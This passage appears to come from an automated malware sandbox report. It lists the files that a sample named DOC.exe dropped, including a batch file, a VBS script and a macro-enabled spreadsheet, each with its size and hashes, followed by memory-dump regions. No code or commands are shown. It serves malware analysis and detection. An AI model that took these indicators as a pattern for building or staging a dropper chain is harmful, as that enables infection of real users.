                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                  Filesize

                                  16B

                                  MD5

                                  46295cac801e5d4857d09837238a6394

                                  SHA1

                                  44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                  SHA256

                                  0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                  SHA512

                                  8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                  Filesize

                                  16B

                                  MD5

                                  206702161f94c5cd39fadd03f4014d98

                                  SHA1

                                  bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                  SHA256

                                  1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                  SHA512

                                  0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                  Filesize

                                  10KB

                                  MD5

                                  89cc797640d44a2a7f2936d942779130

                                  SHA1

                                  501dbfa2ebea0505e68895174db5110017957b82

                                  SHA256

                                  80142692a53e1cfb016a8d2eef5229c8ae45102a1b7dadfe957001f7f027da82

                                  SHA512

                                  f604e1577f236dab6c16143f7bd87d7c13241b00dc9e233129777af501ba7bcb23c32a4e689f34a469ec0ff5a7defeb78360233d92a04763482f5286f1d92d10

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres
                                  Filesize

                                  4KB

                                  MD5

                                  612f522b415045e0ff10cda56eb3bdb1

                                  SHA1

                                  9f30356c67e4dfbd8b7fab6b0a1959664cf27cb1

                                  SHA256

                                  0c42775f74555c61df0818a2ca2006e420282991ce34292247220e3cbd575dc9

                                  SHA512

                                  e6075ca9ddcd068a4d362d1338ef98339168d6c1052c76a22e36718cd11cce192d9a649c78baeb9f8d646388eb4694732522e8ea892a42a0c50b4ad3bbe7bcb8

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  ba169f4dcbbf147fe78ef0061a95e83b

                                  SHA1

                                  92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                  SHA256

                                  5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                  SHA512

                                  8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  34f595487e6bfd1d11c7de88ee50356a

                                  SHA1

                                  4caad088c15766cc0fa1f42009260e9a02f953bb

                                  SHA256

                                  0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

                                  SHA512

                                  10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  0f6a3762a04bbb03336fb66a040afb97

                                  SHA1

                                  0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

                                  SHA256

                                  36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

                                  SHA512

                                  cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  f1c10b5a8a1723292d7f2497fc0ea413

                                  SHA1

                                  d5008d39de67668cacf974188b9b2a03063a31c5

                                  SHA256

                                  431bb1eb5470b7a2506e73760b9899a72889500004847f2c4d54fdea34562a73

                                  SHA512

                                  7f1e237afc313b3cba6d1b612e28915398f2f82e915fc8bb751890a46b19842bfddc894674980f35d85d6003ba8d20798471b1d5e194a2fa95bb99c0a9a9fc00

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  f4cd59fec6cf54c85fc53e911914bf82

                                  SHA1

                                  50c1bf0969af6099d4b602a1d923a9b693a9b9ff

                                  SHA256

                                  70329406d55a7f671e2c30943772bfde19ceb53f7a402222aa0f74669f741f17

                                  SHA512

                                  5cfc2de8d95b1670570908c65389391f107d0f023f8a92412f001bb61982301e3405b692390c502b3f302df907fa1231cd056863cc9151dbbdb59c579858d5dc

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  15dde0683cd1ca19785d7262f554ba93

                                  SHA1

                                  d039c577e438546d10ac64837b05da480d06bf69

                                  SHA256

                                  d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                  SHA512

                                  57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  944B

                                  MD5

                                  800b177dc8e90422f2d2b13672e3ab07

                                  SHA1

                                  1ecd97cc3aec28e977e8155f2356908b184f3146

                                  SHA256

                                  24018c11408969d7b64c65a3b80cd4df17533d052b7557478006ea65ff497e6e

                                  SHA512

                                  5d59c7357b0ce9b1ee7e339a4f370bf84640c2f1ed050b767f0f1e380f2a432dd375b801ee56dbd5c480738e77e0701606d1e8e338f33b1d8655c31bed8a0638

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\._cache_DOC.exe
                                  Filesize

                                  935KB

                                  MD5

                                  a1d37a2a0a4cd5038e129946ee935868

                                  SHA1

                                  87042fbecf1558a2e974c6ad045584f23e1ac7c9

                                  SHA256

                                  9988b0297ad8be4bd3c559437176eaca54cdc36593728967395c4dee21fc898c

                                  SHA512

                                  eb6cfcc7b1c526c06737dc6187af4f65bdd178ffc951cf8bb13571b44cc2c3c0cd051c6e9b4930433f8e6830420a04e0b538d353dd86a1fefb0663032c37c03c

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\1woLsxIk.xlsm
                                  Filesize

                                  17KB

                                  MD5

                                  e566fc53051035e1e6fd0ed1823de0f9

                                  SHA1

                                  00bc96c48b98676ecd67e81a6f1d7754e4156044

                                  SHA256

                                  8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

                                  SHA512

                                  a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\6F085E00
                                  Filesize

                                  22KB

                                  MD5

                                  e7a348fefbd177b76c61c052c4effe0e

                                  SHA1

                                  fcf74b2b838432b60418f1df6b0e614e69b95aeb

                                  SHA256

                                  c267698094cb719170bb7213b4ed4c59d0f1fc8ef9a9c4dabab1053a0d3c2dea

                                  SHA512

                                  66664cc21e708a957f9dfa06b971de20620e27b92f52454fc3dfc7377ca134b028867fb338fc86029f9c778508aa4eceac620fc016bb3c8858340dbe16f53566

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\BatchByloadStartHid.bat
                                  Filesize

                                  1KB

                                  MD5

                                  45a66afa3b07b3143f0d0c3515898bae

                                  SHA1

                                  cc5baf0c4d2fc0b034974786f20087e058915693

                                  SHA256

                                  8a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6

                                  SHA512

                                  04aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\MRIYKG.vbs
                                  Filesize

                                  842B

                                  MD5

                                  6ebd7b6ae7b0ec775744d0bc88c1ee56

                                  SHA1

                                  27724aad404db1c8ad3b60bb675ad33ab97f24dd

                                  SHA256

                                  58cc7247b20ae7b181bbf4f9078665a7989750c897d073d3d2f1227945e54fe6

                                  SHA512

                                  e8e2996a6aa46733cd6973dd3b70be65df428ad413504892cbc4136fb5e458843ca928fc2b70ee3560855db3bea7b0a09fc07a1d17a3e7e4cb9c3225ddd803f3

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yd533gnt.m2d.ps1
                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  Download Submit

                                • C:\Users\Admin\Downloads\DOC.exe
                                  Filesize

                                  1.6MB

                                  MD5

                                  1d2237faf8e6198625010cb580280901

                                  SHA1

                                  592449bddf763bb63c22f638cb42f71484f87f06

                                  SHA256

                                  78643b903379276085c5ef0092afc5c10dee821c5754e01bc8ef835907b16ac4

                                  SHA512

                                  8abe1ff967d92c663080caf54f315e534ea296c91474d66cd327dccc38a3aa8685101649bb120e28f1438011596dde4f2f83e8150c90d51529efce9906a5aa0b

                                  Download Submit

                                • C:\Users\Admin\Downloads\DOC.zip
                                  Filesize

                                  1.2MB

                                  MD5

                                  9353cd481543e4fcf91e2c770fbcfefb

                                  SHA1

                                  a29a232bc73842cb11d87dc906747a55cc9ed27d

                                  SHA256

                                  9c2ab47b11c7c94a4f2416030f6383b235baf30770881ba91e7d6534610a5cd5

                                  SHA512

                                  827e1e0c0ed0b664b2232fc28444476a9f28f2df0ebe4638d93c183684b9fcdab26c26d5c1374146d8d50d13757408ceabc1ccffb616913cb8ced08dc0d2d3a2

                                  Download Submit

                                • memory/1016-429-0x0000000000CD0000-0x0000000000ED4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/1016-427-0x0000000000CD0000-0x0000000000ED4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/2080-303-0x0000000000400000-0x00000000005AC000-memory.dmp

                                  Filesize

                                  1.7MB

                                  Download

                                • memory/2208-15-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/2208-0-0x00007FFFFE6F3000-0x00007FFFFE6F5000-memory.dmp

                                  Filesize

                                  8KB

                                  Download

                                • memory/2208-1-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/2208-11-0x000001C7FBA90000-0x000001C7FBAB2000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/3244-372-0x00007FF7DCAD0000-0x00007FF7DCAE0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-373-0x00007FF7DCAD0000-0x00007FF7DCAE0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-371-0x00007FF7DCAD0000-0x00007FF7DCAE0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-370-0x00007FF7DCAD0000-0x00007FF7DCAE0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-376-0x00007FF7DA9E0000-0x00007FF7DA9F0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-378-0x00007FF7DA9E0000-0x00007FF7DA9F0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3244-374-0x00007FF7DCAD0000-0x00007FF7DCAE0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/3376-484-0x0000000000CD0000-0x0000000000ED4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/3972-28-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/3972-31-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/3972-17-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/3972-29-0x00007FFFFE6F0000-0x00007FFFFF1B1000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4032-431-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-446-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-430-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-481-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-479-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-436-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-438-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-440-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-442-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-244-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-475-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-471-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4032-473-0x0000000000D20000-0x0000000000F24000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4304-468-0x0000000000CD0000-0x0000000000ED4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4840-472-0x0000000000400000-0x00000000005AC000-memory.dmp

                                  Filesize

                                  1.7MB

                                  Download

                                • memory/4840-432-0x0000000000400000-0x00000000005AC000-memory.dmp

                                  Filesize

                                  1.7MB

                                  Download

                                • memory/4940-365-0x00000000006D0000-0x00000000008D4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download

                                • memory/4940-369-0x00000000006D0000-0x00000000008D4000-memory.dmp

                                  Filesize

                                  2.0MB

                                  Download